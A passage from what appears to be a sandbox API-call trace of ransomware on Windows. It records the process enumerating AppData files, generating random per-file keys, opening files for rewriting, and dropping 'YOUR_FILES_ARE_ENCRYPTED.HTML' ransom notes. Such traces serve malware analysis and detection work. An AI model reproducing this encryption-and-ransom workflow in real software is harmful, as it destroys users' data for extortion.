param_1=0x4ebda6e, param_2="%02X" | out: param_1="ED") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="A5") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="BB") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="39") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="81") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="14") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="10") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B8") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="DB") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5E") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="58") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="C2") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C1") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B3") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F5") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="0E") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5E") returned 2 [0164.982] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0C") returned 2 [0164.982] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv" [0164.982] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.982] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.995] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1307de70, ftCreationTime.dwHighDateTime=0x1d7dea2, ftLastAccessTime.dwLowDateTime=0x3625ef70, ftLastAccessTime.dwHighDateTime=0x1d7e6d4, ftLastWriteTime.dwLowDateTime=0x3625ef70, ftLastWriteTime.dwHighDateTime=0x1d7e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x48a7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="I0uQgvKvNStKM1d2e.pdf", cAlternateFileName="I0UQGV~1.PDF")) returned 1 [0164.995] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf") returned 61 [0164.995] lstrcmpW (lpString1="I0uQgvKvNStKM1d2e.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.995] PathFindExtensionW (pszPath="I0uQgvKvNStKM1d2e.pdf") returned=".pdf" [0164.995] lstrlenW (lpString=".pdf") returned 4 [0164.995] PathFindExtensionW (pszPath="I0uQgvKvNStKM1d2e.pdf") returned=".pdf" [0164.995] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\i0uqgvkvnstkm1d2e.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.996] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=18599) returned 1 [0164.996] GetProcessHeap () returned 0x270000 [0164.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.997] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="9F") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3F") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C7") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B0") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="03") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="9A") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="B0") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="27") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="1A") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="82") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="08") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="F3") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="1A") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C4") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="EC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C3") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E2") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="19") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="EC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BC") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="95") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E1") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="92") returned 2 [0164.997] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EA") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="EB") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3A") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="70") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="54") returned 2 [0164.998] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0D") returned 2 [0164.998] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\I0uQgvKvNStKM1d2e.pdf" [0164.998] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.998] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.007] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x554b56c0, ftCreationTime.dwHighDateTime=0x1d7e0a7, ftLastAccessTime.dwLowDateTime=0xb6d35c50, ftLastAccessTime.dwHighDateTime=0x1d7e3c0, ftLastWriteTime.dwLowDateTime=0xb6d35c50, ftLastWriteTime.dwHighDateTime=0x1d7e3c0, nFileSizeHigh=0x0, nFileSizeLow=0x4690, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ib4hVk.png", cAlternateFileName="")) returned 1 [0165.009] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png") returned 50 [0165.009] lstrcmpW (lpString1="ib4hVk.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.009] PathFindExtensionW (pszPath="ib4hVk.png") returned=".png" [0165.009] lstrlenW (lpString=".png") returned 4 [0165.009] PathFindExtensionW (pszPath="ib4hVk.png") returned=".png" [0165.009] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ib4hvk.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.009] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=18064) returned 1 [0165.010] GetProcessHeap () returned 0x270000 [0165.010] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.010] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="E2") returned 2 [0165.010] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9D") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="27") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="86") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="3B") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="BF") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8A") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="A7") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="9B") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1A") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="BB") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="87") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="FA") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="56") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="09") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="89") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="38") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="EC") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E8") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="59") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DF") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="03") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2C") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="7F") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BF") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="D8") returned 2 [0165.011] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="F1") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="DB") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="2A") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D2") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="55") returned 2 [0165.012] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="46") returned 2 [0165.012] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\ib4hVk.png" [0165.012] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.012] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.024] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0165.024] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities") returned 50 [0165.024] GetProcessHeap () returned 0x270000 [0165.024] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.024] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities" [0165.024] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\*" [0165.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0165.025] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.025] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 1 [0165.025] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned 89 [0165.025] GetProcessHeap () returned 0x270000 [0165.025] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.025] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" [0165.025] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*" [0165.025] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.026] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.026] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.026] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.026] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0165.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\identities\\{b85dca4a-5c21-4ec5-af48-a2a88cd3d1d9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.027] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.030] CloseHandle (hObject=0x5e4) returned 1 [0165.030] GetProcessHeap () returned 0x270000 [0165.031] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.031] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 0 [0165.031] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0165.032] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0165.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\identities\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0165.032] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0165.035] CloseHandle (hObject=0x598) returned 1 [0165.035] GetProcessHeap () returned 0x270000 [0165.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55caf3a0, ftCreationTime.dwHighDateTime=0x1d7dd5d, ftLastAccessTime.dwLowDateTime=0x66eaf130, ftLastAccessTime.dwHighDateTime=0x1d7df06, ftLastWriteTime.dwLowDateTime=0x66eaf130, ftLastWriteTime.dwHighDateTime=0x1d7df06, nFileSizeHigh=0x0, nFileSizeLow=0x180ad, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="l6pIAmp1Q.mkv", cAlternateFileName="L6PIAM~1.MKV")) returned 1 [0165.036] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\l6pIAmp1Q.mkv") returned 53 [0165.036] lstrcmpW (lpString1="l6pIAmp1Q.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.036] PathFindExtensionW (pszPath="l6pIAmp1Q.mkv") returned=".mkv" [0165.037] lstrlenW (lpString=".mkv") returned 4 [0165.037] PathFindExtensionW (pszPath="l6pIAmp1Q.mkv") returned=".mkv" [0165.037] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89f30b0, ftCreationTime.dwHighDateTime=0x1d7ddf7, ftLastAccessTime.dwLowDateTime=0xcc7b0720, ftLastAccessTime.dwHighDateTime=0x1d7e4b4, ftLastWriteTime.dwLowDateTime=0xcc7b0720, ftLastWriteTime.dwHighDateTime=0x1d7e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x591f, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="MbOel2sTiSRFkd2I.png", cAlternateFileName="MBOEL2~1.PNG")) returned 1 [0165.037] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png") returned 60 [0165.037] lstrcmpW (lpString1="MbOel2sTiSRFkd2I.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.037] PathFindExtensionW (pszPath="MbOel2sTiSRFkd2I.png") returned=".png" [0165.037] lstrlenW (lpString=".png") returned 4 [0165.037] PathFindExtensionW (pszPath="MbOel2sTiSRFkd2I.png") returned=".png" [0165.037] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\mboel2stisrfkd2i.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.038] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=22815) returned 1 [0165.038] GetProcessHeap () returned 0x270000 [0165.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.039] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="13") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AA") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="44") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="80") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DF") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A8") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DB") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda52, 